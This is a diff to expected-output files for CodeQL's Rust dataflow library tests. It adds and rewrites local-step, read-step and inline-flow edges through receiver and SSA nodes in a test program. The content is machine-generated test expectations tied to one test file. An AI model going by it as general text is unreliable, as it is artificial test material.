@@ -331,18 +341,30 @@ localStep | main.rs:277:9:277:10 | i3 | main.rs:277:9:277:10 | i3 | | main.rs:277:14:277:16 | TryExpr | main.rs:277:9:277:10 | i3 | | main.rs:279:5:279:9 | Ok(...) | main.rs:269:46:280:1 | { ... } | +| main.rs:283:9:283:10 | [SSA] s1 | main.rs:284:10:284:11 | [SSA] s1 | | main.rs:283:9:283:10 | [SSA] s1 | main.rs:284:10:284:11 | s1 | | main.rs:283:9:283:10 | s1 | main.rs:283:9:283:10 | [SSA] s1 | | main.rs:283:9:283:10 | s1 | main.rs:283:9:283:10 | s1 | | main.rs:283:32:283:45 | Ok(...) | main.rs:283:9:283:10 | s1 | +| main.rs:284:10:284:11 | [SSA] s1 | main.rs:285:10:285:11 | s1 | | main.rs:284:10:284:11 | [post] s1 | main.rs:285:10:285:11 | s1 | +| main.rs:284:10:284:11 | s1 | main.rs:284:10:284:22 | receiver for s1 | | main.rs:284:10:284:11 | s1 | main.rs:285:10:285:11 | s1 | +| main.rs:284:10:284:22 | [post] receiver for s1 | main.rs:284:10:284:11 | [post] s1 | +| main.rs:285:10:285:11 | s1 | main.rs:285:10:285:26 | receiver for s1 | +| main.rs:285:10:285:26 | [post] receiver for s1 | main.rs:285:10:285:11 | [post] s1 | +| main.rs:287:9:287:10 | [SSA] s2 | main.rs:288:10:288:11 | [SSA] s2 | | main.rs:287:9:287:10 | [SSA] s2 | main.rs:288:10:288:11 | s2 | | main.rs:287:9:287:10 | s2 | main.rs:287:9:287:10 | [SSA] s2 | | main.rs:287:9:287:10 | s2 | main.rs:287:9:287:10 | s2 | | main.rs:287:32:287:46 | Err(...) 
| main.rs:287:9:287:10 | s2 | +| main.rs:288:10:288:11 | [SSA] s2 | main.rs:289:10:289:11 | s2 | | main.rs:288:10:288:11 | [post] s2 | main.rs:289:10:289:11 | s2 | +| main.rs:288:10:288:11 | s2 | main.rs:288:10:288:22 | receiver for s2 | | main.rs:288:10:288:11 | s2 | main.rs:289:10:289:11 | s2 | +| main.rs:288:10:288:22 | [post] receiver for s2 | main.rs:288:10:288:11 | [post] s2 | +| main.rs:289:10:289:11 | s2 | main.rs:289:10:289:26 | receiver for s2 | +| main.rs:289:10:289:26 | [post] receiver for s2 | main.rs:289:10:289:11 | [post] s2 | | main.rs:298:9:298:10 | [SSA] s1 | main.rs:300:11:300:12 | s1 | | main.rs:298:9:298:10 | s1 | main.rs:298:9:298:10 | [SSA] s1 | | main.rs:298:9:298:10 | s1 | main.rs:298:9:298:10 | s1 | @@ -591,8 +613,10 @@ localStep | main.rs:426:39:426:72 | ...: Vec::<...> | main.rs:426:39:426:43 | names | | main.rs:427:9:427:20 | default_name | main.rs:427:9:427:20 | [SSA] default_name | | main.rs:427:9:427:20 | default_name | main.rs:427:9:427:20 | default_name | +| main.rs:427:24:427:33 | source(...) | main.rs:427:24:427:45 | receiver for source(...) | | main.rs:427:24:427:45 | ... .to_string(...) | main.rs:427:9:427:20 | default_name | | main.rs:427:24:427:45 | ... .to_string(...) | main.rs:428:9:428:20 | phi(default_name) | +| main.rs:427:24:427:45 | [post] receiver for source(...) | main.rs:427:24:427:33 | [post] source(...) | | main.rs:428:5:434:5 | for ... in ... { ... } | main.rs:426:75:435:1 | { ... } | | main.rs:428:9:428:20 | phi(default_name) | main.rs:428:9:428:20 | phi(default_name) | | main.rs:428:9:428:20 | phi(default_name) | main.rs:430:41:430:67 | default_name | 
@@ -606,10 +630,16 @@ localStep | main.rs:430:17:430:17 | [SSA] n | main.rs:431:18:431:18 | n | | main.rs:430:17:430:17 | n | main.rs:430:17:430:17 | [SSA] n | | main.rs:430:17:430:17 | n | main.rs:430:17:430:17 | n | +| main.rs:430:21:430:24 | name | main.rs:430:21:430:68 | receiver for name | +| main.rs:430:21:430:68 | [post] receiver for name | main.rs:430:21:430:24 | [post] name | | main.rs:430:21:430:68 | name.unwrap_or_else(...) | main.rs:430:17:430:17 | n | | main.rs:430:41:430:67 | [post] default_name | main.rs:428:9:428:20 | phi(default_name) | | main.rs:430:41:430:67 | closure self in \|...\| ... | main.rs:430:44:430:55 | this | | main.rs:430:41:430:67 | default_name | main.rs:428:9:428:20 | phi(default_name) | +| main.rs:430:44:430:55 | default_name | main.rs:430:44:430:67 | receiver for default_name | +| main.rs:430:44:430:67 | [post] receiver for default_name | main.rs:430:44:430:55 | [post] default_name | +| main.rs:431:18:431:18 | n | main.rs:431:18:431:24 | receiver for n | +| main.rs:431:18:431:24 | [post] receiver for n | main.rs:431:18:431:18 | [post] n | | main.rs:444:9:444:9 | [SSA] s | main.rs:445:10:445:10 | s | | main.rs:444:9:444:9 | s | main.rs:444:9:444:9 | [SSA] s | | main.rs:444:9:444:9 | s | main.rs:444:9:444:9 | s | 
@@ -620,64 +650,129 @@ localStep | main.rs:448:16:448:16 | s | main.rs:448:16:448:16 | s | | main.rs:448:16:448:24 | ...: String | main.rs:448:16:448:16 | s | | main.rs:449:14:449:20 | FormatArgsExpr | main.rs:449:14:449:20 | MacroExpr | +| main.rs:453:9:453:9 | [SSA] a | main.rs:454:13:454:13 | [SSA] a | | main.rs:453:9:453:9 | [SSA] a | main.rs:454:13:454:13 | a | | main.rs:453:9:453:9 | a | main.rs:453:9:453:9 | [SSA] a | | main.rs:453:9:453:9 | a | main.rs:453:9:453:9 | a | | main.rs:453:13:453:22 | source(...) | main.rs:453:9:453:9 | a | +| main.rs:454:9:454:9 | [SSA] b | main.rs:455:13:455:13 | [SSA] b | | main.rs:454:9:454:9 | [SSA] b | main.rs:455:13:455:13 | b | | main.rs:454:9:454:9 | b | main.rs:454:9:454:9 | [SSA] b | | main.rs:454:9:454:9 | b | main.rs:454:9:454:9 | b | +| main.rs:454:13:454:13 | [SSA] a | main.rs:458:10:458:10 | a | | main.rs:454:13:454:13 | [post] a | main.rs:458:10:458:10 | a | +| main.rs:454:13:454:13 | a | main.rs:454:13:454:25 | receiver for a | | main.rs:454:13:454:13 | a | main.rs:458:10:458:10 | a | +| main.rs:454:13:454:25 | [post] receiver for a | main.rs:454:13:454:13 | [post] a | | main.rs:454:13:454:25 | a.to_string(...) | main.rs:454:9:454:9 | b | | main.rs:455:9:455:9 | [SSA] c | main.rs:460:10:460:10 | c | | main.rs:455:9:455:9 | c | main.rs:455:9:455:9 | [SSA] c | | main.rs:455:9:455:9 | c | main.rs:455:9:455:9 | c | +| main.rs:455:13:455:13 | [SSA] b | main.rs:456:19:456:19 | [SSA] b | +| main.rs:455:13:455:13 | [SSA] b | main.rs:456:19:456:19 | b | +| main.rs:455:13:455:13 | [post] b | main.rs:456:19:456:19 | [SSA] b | | main.rs:455:13:455:13 | [post] b | main.rs:456:19:456:19 | b | +| main.rs:455:13:455:13 | b | main.rs:455:13:455:28 | receiver for b | +| main.rs:455:13:455:13 | b | main.rs:456:19:456:19 | [SSA] b | | main.rs:455:13:455:13 | b | main.rs:456:19:456:19 | b | +| main.rs:455:13:455:28 | [post] receiver for b | main.rs:455:13:455:13 | [post] b | +| main.rs:455:13:455:28 | b.parse(...) 
| main.rs:455:13:455:37 | receiver for b.parse(...) | | main.rs:455:13:455:37 | ... .unwrap(...) | main.rs:455:9:455:9 | c | +| main.rs:455:13:455:37 | [post] receiver for b.parse(...) | main.rs:455:13:455:28 | [post] b.parse(...) | | main.rs:456:9:456:9 | [SSA] d | main.rs:461:10:461:10 | d | | main.rs:456:9:456:9 | d | main.rs:456:9:456:9 | [SSA] d | | main.rs:456:9:456:9 | d | main.rs:456:9:456:9 | d | +| main.rs:456:19:456:19 | [SSA] b | main.rs:459:17:459:17 | b | | main.rs:456:19:456:19 | [post] b | main.rs:459:17:459:17 | b | +| main.rs:456:19:456:19 | b | main.rs:456:19:456:27 | receiver for b | | main.rs:456:19:456:19 | b | main.rs:459:17:459:17 | b | +| main.rs:456:19:456:27 | [post] receiver for b | main.rs:456:19:456:19 | [post] b | +| main.rs:456:19:456:27 | b.parse(...) | main.rs:456:19:456:36 | receiver for b.parse(...) | | main.rs:456:19:456:36 | ... .unwrap(...) | main.rs:456:9:456:9 | d | +| main.rs:456:19:456:36 | [post] receiver for b.parse(...) | main.rs:456:19:456:27 | [post] b.parse(...) | | main.rs:465:9:465:10 | [SSA] vs | main.rs:467:10:467:11 | vs | | main.rs:465:9:465:10 | vs | main.rs:465:9:465:10 | [SSA] vs | | main.rs:465:9:465:10 | vs | main.rs:465:9:465:10 | vs | | main.rs:465:14:465:34 | [...] 
| main.rs:465:9:465:10 | vs | +| main.rs:467:10:467:11 | [post] vs | main.rs:468:11:468:12 | [SSA] vs | | main.rs:467:10:467:11 | [post] vs | main.rs:468:11:468:12 | vs | +| main.rs:467:10:467:11 | vs | main.rs:468:11:468:12 | [SSA] vs | | main.rs:467:10:467:11 | vs | main.rs:468:11:468:12 | vs | +| main.rs:468:11:468:12 | [SSA] vs | main.rs:469:11:469:12 | [SSA] vs | +| main.rs:468:11:468:12 | [SSA] vs | main.rs:469:11:469:12 | vs | +| main.rs:468:11:468:12 | [post] vs | main.rs:469:11:469:12 | [SSA] vs | | main.rs:468:11:468:12 | [post] vs | main.rs:469:11:469:12 | vs | +| main.rs:468:11:468:12 | vs | main.rs:468:11:468:19 | receiver for vs | +| main.rs:468:11:468:12 | vs | main.rs:469:11:469:12 | [SSA] vs | | main.rs:468:11:468:12 | vs | main.rs:469:11:469:12 | vs | +| main.rs:468:11:468:19 | [post] receiver for vs | main.rs:468:11:468:12 | [post] vs | +| main.rs:468:11:468:19 | vs.iter(...) | main.rs:468:11:468:26 | receiver for vs.iter(...) | +| main.rs:468:11:468:26 | ... .next(...) | main.rs:468:11:468:35 | receiver for ... .next(...) | +| main.rs:468:11:468:26 | [post] receiver for vs.iter(...) | main.rs:468:11:468:19 | [post] vs.iter(...) | +| main.rs:468:11:468:35 | [post] receiver for ... .next(...) | main.rs:468:11:468:26 | [post] ... .next(...) | +| main.rs:469:11:469:12 | [SSA] vs | main.rs:471:14:471:15 | vs | | main.rs:469:11:469:12 | [post] vs | main.rs:471:14:471:15 | vs | +| main.rs:469:11:469:12 | vs | main.rs:469:11:469:19 | receiver for vs | | main.rs:469:11:469:12 | vs | main.rs:471:14:471:15 | vs | +| main.rs:469:11:469:19 | [post] receiver for vs | main.rs:469:11:469:12 | [post] vs | +| main.rs:469:11:469:19 | vs.iter(...) | main.rs:469:11:469:26 | receiver for vs.iter(...) | +| main.rs:469:11:469:26 | ... .nth(...) | main.rs:469:11:469:35 | receiver for ... .nth(...) | +| main.rs:469:11:469:26 | [post] receiver for vs.iter(...) | main.rs:469:11:469:19 | [post] vs.iter(...) | +| main.rs:469:11:469:35 | [post] receiver for ... .nth(...) 
| main.rs:469:11:469:26 | [post] ... .nth(...) | | main.rs:471:9:471:9 | [SSA] v | main.rs:472:14:472:14 | v | | main.rs:471:9:471:9 | v | main.rs:471:9:471:9 | [SSA] v | | main.rs:471:9:471:9 | v | main.rs:471:9:471:9 | v | +| main.rs:471:14:471:15 | vs | main.rs:474:15:474:16 | [SSA] vs | | main.rs:471:14:471:15 | vs | main.rs:474:15:474:16 | vs | | main.rs:474:10:474:10 | [SSA] v | main.rs:475:14:475:14 | v | | main.rs:474:10:474:10 | v | main.rs:474:10:474:10 | [SSA] v | | main.rs:474:10:474:10 | v | main.rs:474:10:474:10 | v | +| main.rs:474:15:474:16 | [SSA] vs | main.rs:478:27:478:28 | [SSA] vs | +| main.rs:474:15:474:16 | [SSA] vs | main.rs:478:27:478:28 | vs | +| main.rs:474:15:474:16 | [post] vs | main.rs:478:27:478:28 | [SSA] vs | | main.rs:474:15:474:16 | [post] vs | main.rs:478:27:478:28 | vs | +| main.rs:474:15:474:16 | vs | main.rs:474:15:474:23 | receiver for vs | +| main.rs:474:15:474:16 | vs | main.rs:478:27:478:28 | [SSA] vs | | main.rs:474:15:474:16 | vs | main.rs:478:27:478:28 | vs | +| main.rs:474:15:474:23 | [post] receiver for vs | main.rs:474:15:474:16 | [post] vs | | main.rs:478:9:478:11 | [SSA] vs2 | main.rs:479:15:479:17 | vs2 | | main.rs:478:9:478:11 | vs2 | main.rs:478:9:478:11 | [SSA] vs2 | | main.rs:478:9:478:11 | vs2 | main.rs:478:9:478:11 | vs2 | +| main.rs:478:27:478:28 | [SSA] vs | main.rs:483:5:483:6 | [SSA] vs | +| main.rs:478:27:478:28 | [SSA] vs | main.rs:483:5:483:6 | vs | +| main.rs:478:27:478:28 | [post] vs | main.rs:483:5:483:6 | [SSA] vs | | main.rs:478:27:478:28 | [post] vs | main.rs:483:5:483:6 | vs | +| main.rs:478:27:478:28 | vs | main.rs:478:27:478:35 | receiver for vs | +| main.rs:478:27:478:28 | vs | main.rs:483:5:483:6 | [SSA] vs | | main.rs:478:27:478:28 | vs | main.rs:483:5:483:6 | vs | +| main.rs:478:27:478:35 | [post] receiver for vs | main.rs:478:27:478:28 | [post] vs | +| main.rs:478:27:478:35 | vs.iter(...) | main.rs:478:27:478:45 | receiver for vs.iter(...) | | main.rs:478:27:478:45 | ... .collect(...) 
| main.rs:478:9:478:11 | vs2 | +| main.rs:478:27:478:45 | [post] receiver for vs.iter(...) | main.rs:478:27:478:35 | [post] vs.iter(...) | | main.rs:479:10:479:10 | [SSA] v | main.rs:480:14:480:14 | v | | main.rs:479:10:479:10 | v | main.rs:479:10:479:10 | [SSA] v | | main.rs:479:10:479:10 | v | main.rs:479:10:479:10 | v | +| main.rs:483:5:483:6 | [SSA] vs | main.rs:484:5:484:6 | [SSA] vs | +| main.rs:483:5:483:6 | [SSA] vs | main.rs:484:5:484:6 | vs | +| main.rs:483:5:483:6 | [post] vs | main.rs:484:5:484:6 | [SSA] vs | | main.rs:483:5:483:6 | [post] vs | main.rs:484:5:484:6 | vs | +| main.rs:483:5:483:6 | vs | main.rs:483:5:483:13 | receiver for vs | +| main.rs:483:5:483:6 | vs | main.rs:484:5:484:6 | [SSA] vs | | main.rs:483:5:483:6 | vs | main.rs:484:5:484:6 | vs | +| main.rs:483:5:483:13 | [post] receiver for vs | main.rs:483:5:483:6 | [post] vs | +| main.rs:483:5:483:13 | vs.iter(...) | main.rs:483:5:483:31 | receiver for vs.iter(...) | +| main.rs:483:5:483:31 | [post] receiver for vs.iter(...) | main.rs:483:5:483:13 | [post] vs.iter(...) | | main.rs:483:20:483:20 | ... | main.rs:483:20:483:20 | x | | main.rs:483:20:483:20 | [SSA] x | main.rs:483:29:483:29 | x | | main.rs:483:20:483:20 | x | main.rs:483:20:483:20 | [SSA] x | | main.rs:483:20:483:20 | x | main.rs:483:20:483:20 | x | +| main.rs:484:5:484:6 | [SSA] vs | main.rs:486:14:486:15 | vs | | main.rs:484:5:484:6 | [post] vs | main.rs:486:14:486:15 | vs | +| main.rs:484:5:484:6 | vs | main.rs:484:5:484:13 | receiver for vs | | main.rs:484:5:484:6 | vs | main.rs:486:14:486:15 | vs | +| main.rs:484:5:484:13 | [post] receiver for vs | main.rs:484:5:484:6 | [post] vs | +| main.rs:484:5:484:13 | vs.iter(...) | main.rs:484:5:484:36 | receiver for vs.iter(...) | +| main.rs:484:5:484:36 | [post] receiver for vs.iter(...) | main.rs:484:5:484:13 | [post] vs.iter(...) | | main.rs:484:25:484:25 | ... 
| main.rs:484:25:484:25 | x | | main.rs:484:25:484:25 | [SSA] x | main.rs:484:34:484:34 | x | | main.rs:484:25:484:25 | x | main.rs:484:25:484:25 | [SSA] x | 
@@ -685,12 +780,43 @@ localStep | main.rs:486:9:486:9 | [SSA] v | main.rs:487:14:487:14 | v | | main.rs:486:9:486:9 | v | main.rs:486:9:486:9 | [SSA] v | | main.rs:486:9:486:9 | v | main.rs:486:9:486:9 | v | +| main.rs:486:14:486:15 | vs | main.rs:486:14:486:27 | receiver for vs | +| main.rs:486:14:486:27 | [post] receiver for vs | main.rs:486:14:486:15 | [post] vs | | main.rs:490:9:490:18 | mut vs_mut | main.rs:490:13:490:18 | vs_mut | +| main.rs:490:13:490:18 | [SSA] vs_mut | main.rs:492:10:492:15 | vs_mut | +| main.rs:490:13:490:18 | vs_mut | main.rs:490:13:490:18 | [SSA] vs_mut | | main.rs:490:22:490:42 | [...] | main.rs:490:9:490:18 | mut vs_mut | +| main.rs:492:10:492:15 | [post] vs_mut | main.rs:493:11:493:16 | [SSA] vs_mut | +| main.rs:492:10:492:15 | [post] vs_mut | main.rs:493:11:493:16 | vs_mut | +| main.rs:492:10:492:15 | vs_mut | main.rs:493:11:493:16 | [SSA] vs_mut | +| main.rs:492:10:492:15 | vs_mut | main.rs:493:11:493:16 | vs_mut | +| main.rs:493:11:493:16 | [SSA] vs_mut | main.rs:494:11:494:16 | [SSA] vs_mut | +| main.rs:493:11:493:16 | [SSA] vs_mut | main.rs:494:11:494:16 | vs_mut | +| main.rs:493:11:493:16 | [post] vs_mut | main.rs:494:11:494:16 | [SSA] vs_mut | +| main.rs:493:11:493:16 | [post] vs_mut | main.rs:494:11:494:16 | vs_mut | +| main.rs:493:11:493:16 | vs_mut | main.rs:493:11:493:23 | receiver for vs_mut | +| main.rs:493:11:493:16 | vs_mut | main.rs:494:11:494:16 | [SSA] vs_mut | +| main.rs:493:11:493:16 | vs_mut | main.rs:494:11:494:16 | vs_mut | +| main.rs:493:11:493:23 | [post] receiver for vs_mut | main.rs:493:11:493:16 | [post] vs_mut | +| main.rs:493:11:493:23 | vs_mut.iter(...) | main.rs:493:11:493:30 | receiver for vs_mut.iter(...) | +| main.rs:493:11:493:30 | ... .next(...) | main.rs:493:11:493:39 | receiver for ... .next(...) | +| main.rs:493:11:493:30 | [post] receiver for vs_mut.iter(...) | main.rs:493:11:493:23 | [post] vs_mut.iter(...) | +| main.rs:493:11:493:39 | [post] receiver for ... .next(...) 
| main.rs:493:11:493:30 | [post] ... .next(...) | +| main.rs:494:11:494:16 | [SSA] vs_mut | main.rs:496:19:496:24 | vs_mut | +| main.rs:494:11:494:16 | [post] vs_mut | main.rs:496:19:496:24 | vs_mut | +| main.rs:494:11:494:16 | vs_mut | main.rs:494:11:494:23 | receiver for vs_mut | +| main.rs:494:11:494:16 | vs_mut | main.rs:496:19:496:24 | vs_mut | +| main.rs:494:11:494:23 | [post] receiver for vs_mut | main.rs:494:11:494:16 | [post] vs_mut | +| main.rs:494:11:494:23 | vs_mut.iter(...) | main.rs:494:11:494:30 | receiver for vs_mut.iter(...) | +| main.rs:494:11:494:30 | ... .nth(...) | main.rs:494:11:494:39 | receiver for ... .nth(...) | +| main.rs:494:11:494:30 | [post] receiver for vs_mut.iter(...) | main.rs:494:11:494:23 | [post] vs_mut.iter(...) | +| main.rs:494:11:494:39 | [post] receiver for ... .nth(...) | main.rs:494:11:494:30 | [post] ... .nth(...) | | main.rs:496:5:498:5 | for ... in ... { ... } | main.rs:464:16:499:1 | { ... } | | main.rs:496:14:496:14 | [SSA] v | main.rs:497:14:497:14 | v | | main.rs:496:14:496:14 | v | main.rs:496:14:496:14 | [SSA] v | | main.rs:496:14:496:14 | v | main.rs:496:14:496:14 | v | +| main.rs:496:19:496:24 | vs_mut | main.rs:496:19:496:35 | receiver for vs_mut | +| main.rs:496:19:496:35 | [post] receiver for vs_mut | main.rs:496:19:496:24 | [post] vs_mut | | main.rs:502:9:502:9 | [SSA] a | main.rs:507:10:507:10 | a | | main.rs:502:9:502:9 | a | main.rs:502:9:502:9 | [SSA] a | | main.rs:502:9:502:9 | a | main.rs:502:9:502:9 | a | 
@@ -2726,6 +2852,11 @@ readStep | main.rs:221:9:221:23 | ...::Some(...) | Some | main.rs:221:22:221:22 | n | | main.rs:230:9:230:15 | Some(...) | Some | main.rs:230:14:230:14 | n | | main.rs:234:9:234:15 | Some(...) | Some | main.rs:234:14:234:14 | n | +| main.rs:241:10:241:11 | s1 | &ref | main.rs:241:10:241:20 | receiver for s1 | +| main.rs:246:10:246:11 | s1 | &ref | main.rs:246:10:246:24 | receiver for s1 | +| main.rs:249:10:249:11 | s2 | &ref | main.rs:249:10:249:33 | receiver for s2 | +| main.rs:254:10:254:11 | s1 | &ref | main.rs:254:10:254:32 | receiver for s1 | +| main.rs:257:10:257:11 | s2 | &ref | main.rs:257:10:257:41 | receiver for s2 | | main.rs:263:14:263:15 | s1 | Ok | main.rs:263:14:263:16 | TryExpr | | main.rs:263:14:263:15 | s1 | Some | main.rs:263:14:263:16 | TryExpr | | main.rs:265:10:265:11 | s2 | Ok | main.rs:265:10:265:12 | TryExpr | @@ -2736,6 +2867,10 @@ readStep | main.rs:274:14:274:15 | s2 | Some | main.rs:274:14:274:16 | TryExpr | | main.rs:277:14:277:15 | s3 | Ok | main.rs:277:14:277:16 | TryExpr | | main.rs:277:14:277:15 | s3 | Some | main.rs:277:14:277:16 | TryExpr | +| main.rs:284:10:284:11 | s1 | &ref | main.rs:284:10:284:22 | receiver for s1 | +| main.rs:285:10:285:11 | s1 | &ref | main.rs:285:10:285:26 | receiver for s1 | +| main.rs:288:10:288:11 | s2 | &ref | main.rs:288:10:288:22 | receiver for s2 | +| main.rs:289:10:289:11 | s2 | &ref | main.rs:289:10:289:26 | receiver for s2 | | main.rs:301:9:301:25 | ...::A(...) | A | main.rs:301:24:301:24 | n | | main.rs:302:9:302:25 | ...::B(...) | B | main.rs:302:24:302:24 | n | | main.rs:305:9:305:25 | ...::A(...) | A | main.rs:305:24:305:24 | n | 
@@ -2775,22 +2910,38 @@ readStep | main.rs:428:9:428:20 | TuplePat | tuple.0 | main.rs:428:10:428:13 | cond | | main.rs:428:9:428:20 | TuplePat | tuple.1 | main.rs:428:16:428:19 | name | | main.rs:428:25:428:29 | names | element | main.rs:428:9:428:20 | TuplePat | +| main.rs:430:21:430:24 | name | &ref | main.rs:430:21:430:68 | receiver for name | | main.rs:430:41:430:67 | [post] \|...\| ... | captured default_name | main.rs:430:41:430:67 | [post] default_name | +| main.rs:430:44:430:55 | default_name | &ref | main.rs:430:44:430:67 | receiver for default_name | | main.rs:430:44:430:55 | this | captured default_name | main.rs:430:44:430:55 | default_name | +| main.rs:431:18:431:18 | n | &ref | main.rs:431:18:431:24 | receiver for n | +| main.rs:454:13:454:13 | a | &ref | main.rs:454:13:454:25 | receiver for a | +| main.rs:455:13:455:13 | b | &ref | main.rs:455:13:455:28 | receiver for b | +| main.rs:456:19:456:19 | b | &ref | main.rs:456:19:456:27 | receiver for b | | main.rs:467:10:467:11 | vs | element | main.rs:467:10:467:14 | vs[0] | +| main.rs:468:11:468:12 | vs | &ref | main.rs:468:11:468:19 | receiver for vs | | main.rs:468:11:468:35 | ... .unwrap(...) | &ref | main.rs:468:10:468:35 | * ... | +| main.rs:469:11:469:12 | vs | &ref | main.rs:469:11:469:19 | receiver for vs | | main.rs:469:11:469:35 | ... .unwrap(...) | &ref | main.rs:469:10:469:35 | * ... | | main.rs:471:14:471:15 | vs | element | main.rs:471:9:471:9 | v | | main.rs:474:9:474:10 | &... | &ref | main.rs:474:10:474:10 | v | +| main.rs:474:15:474:16 | vs | &ref | main.rs:474:15:474:23 | receiver for vs | | main.rs:474:15:474:23 | vs.iter(...) | element | main.rs:474:9:474:10 | &... | +| main.rs:478:27:478:28 | vs | &ref | main.rs:478:27:478:35 | receiver for vs | | main.rs:479:9:479:10 | &... | &ref | main.rs:479:10:479:10 | v | | main.rs:479:15:479:17 | vs2 | element | main.rs:479:9:479:10 | &... 
| +| main.rs:483:5:483:6 | vs | &ref | main.rs:483:5:483:13 | receiver for vs | | main.rs:483:29:483:29 | x | &ref | main.rs:483:28:483:29 | * ... | +| main.rs:484:5:484:6 | vs | &ref | main.rs:484:5:484:13 | receiver for vs | | main.rs:484:34:484:34 | x | &ref | main.rs:484:33:484:34 | * ... | +| main.rs:486:14:486:15 | vs | &ref | main.rs:486:14:486:27 | receiver for vs | | main.rs:486:14:486:27 | vs.into_iter(...) | element | main.rs:486:9:486:9 | v | | main.rs:492:10:492:15 | vs_mut | element | main.rs:492:10:492:18 | vs_mut[0] | +| main.rs:493:11:493:16 | vs_mut | &ref | main.rs:493:11:493:23 | receiver for vs_mut | | main.rs:493:11:493:39 | ... .unwrap(...) | &ref | main.rs:493:10:493:39 | * ... | +| main.rs:494:11:494:16 | vs_mut | &ref | main.rs:494:11:494:23 | receiver for vs_mut | | main.rs:494:11:494:39 | ... .unwrap(...) | &ref | main.rs:494:10:494:39 | * ... | | main.rs:496:9:496:14 | &mut ... | &ref | main.rs:496:14:496:14 | v | +| main.rs:496:19:496:24 | vs_mut | &ref | main.rs:496:19:496:35 | receiver for vs_mut | | main.rs:496:19:496:35 | vs_mut.iter_mut(...) | element | main.rs:496:9:496:14 | &mut ... | | main.rs:510:11:510:15 | c_ref | &ref | main.rs:510:10:510:15 | * ... | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index 0c9dad76710b..0781289e30f5 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected 
@@ -77,19 +77,16 @@ edges | main.rs:229:11:229:12 | s1 [Some] | main.rs:230:9:230:15 | Some(...) [Some] | provenance | | | main.rs:230:9:230:15 | Some(...) [Some] | main.rs:230:14:230:14 | n | provenance | | | main.rs:230:14:230:14 | n | main.rs:230:25:230:25 | n | provenance | | -| main.rs:240:9:240:10 | s1 [Some] | main.rs:241:10:241:11 | s1 [Some] | provenance | | +| main.rs:240:9:240:10 | s1 [Some] | main.rs:241:10:241:20 | s1.unwrap(...) | provenance | MaD:1 | | main.rs:240:14:240:29 | Some(...) [Some] | main.rs:240:9:240:10 | s1 [Some] | provenance | | | main.rs:240:19:240:28 | source(...) | main.rs:240:14:240:29 | Some(...) [Some] | provenance | | -| main.rs:241:10:241:11 | s1 [Some] | main.rs:241:10:241:20 | s1.unwrap(...) | provenance | MaD:1 | -| main.rs:245:9:245:10 | s1 [Some] | main.rs:246:10:246:11 | s1 [Some] | provenance | | +| main.rs:245:9:245:10 | s1 [Some] | main.rs:246:10:246:24 | s1.unwrap_or(...) | provenance | MaD:3 | | main.rs:245:14:245:29 | Some(...) [Some] | main.rs:245:9:245:10 | s1 [Some] | provenance | | | main.rs:245:19:245:28 | source(...) | main.rs:245:14:245:29 | Some(...) [Some] | provenance | | -| main.rs:246:10:246:11 | s1 [Some] | main.rs:246:10:246:24 | s1.unwrap_or(...) | provenance | MaD:3 | | main.rs:249:23:249:32 | source(...) | main.rs:249:10:249:33 | s2.unwrap_or(...) | provenance | MaD:2 | -| main.rs:253:9:253:10 | s1 [Some] | main.rs:254:10:254:11 | s1 [Some] | provenance | | +| main.rs:253:9:253:10 | s1 [Some] | main.rs:254:10:254:32 | s1.unwrap_or_else(...) | provenance | MaD:5 | | main.rs:253:14:253:29 | Some(...) [Some] | main.rs:253:9:253:10 | s1 [Some] | provenance | | | main.rs:253:19:253:28 | source(...) | main.rs:253:14:253:29 | Some(...) [Some] | provenance | | -| main.rs:254:10:254:11 | s1 [Some] | main.rs:254:10:254:32 | s1.unwrap_or_else(...) | provenance | MaD:5 | | main.rs:257:31:257:40 | source(...) | main.rs:257:10:257:41 | s2.unwrap_or_else(...) 
| provenance | MaD:4 | | main.rs:261:9:261:10 | s1 [Some] | main.rs:263:14:263:15 | s1 [Some] | provenance | | | main.rs:261:14:261:29 | Some(...) [Some] | main.rs:261:9:261:10 | s1 [Some] | provenance | | @@ -103,14 +100,12 @@ edges | main.rs:273:9:273:10 | i1 | main.rs:275:10:275:11 | i1 | provenance | | | main.rs:273:14:273:15 | s1 [Ok] | main.rs:273:14:273:16 | TryExpr | provenance | | | main.rs:273:14:273:16 | TryExpr | main.rs:273:9:273:10 | i1 | provenance | | -| main.rs:283:9:283:10 | s1 [Ok] | main.rs:284:10:284:11 | s1 [Ok] | provenance | | +| main.rs:283:9:283:10 | s1 [Ok] | main.rs:284:10:284:22 | s1.expect(...) | provenance | MaD:6 | | main.rs:283:32:283:45 | Ok(...) [Ok] | main.rs:283:9:283:10 | s1 [Ok] | provenance | | | main.rs:283:35:283:44 | source(...) | main.rs:283:32:283:45 | Ok(...) [Ok] | provenance | | -| main.rs:284:10:284:11 | s1 [Ok] | main.rs:284:10:284:22 | s1.expect(...) | provenance | MaD:6 | -| main.rs:287:9:287:10 | s2 [Err] | main.rs:289:10:289:11 | s2 [Err] | provenance | | +| main.rs:287:9:287:10 | s2 [Err] | main.rs:289:10:289:26 | s2.expect_err(...) | provenance | MaD:7 | | main.rs:287:32:287:46 | Err(...) [Err] | main.rs:287:9:287:10 | s2 [Err] | provenance | | | main.rs:287:36:287:45 | source(...) | main.rs:287:32:287:46 | Err(...) [Err] | provenance | | -| main.rs:289:10:289:11 | s2 [Err] | main.rs:289:10:289:26 | s2.expect_err(...) | provenance | MaD:7 | | main.rs:298:9:298:10 | s1 [A] | main.rs:300:11:300:12 | s1 [A] | provenance | | | main.rs:298:14:298:39 | ...::A(...) [A] | main.rs:298:9:298:10 | s1 [A] | provenance | | | main.rs:298:29:298:38 | source(...) | main.rs:298:14:298:39 | ...::A(...) [A] | provenance | | 
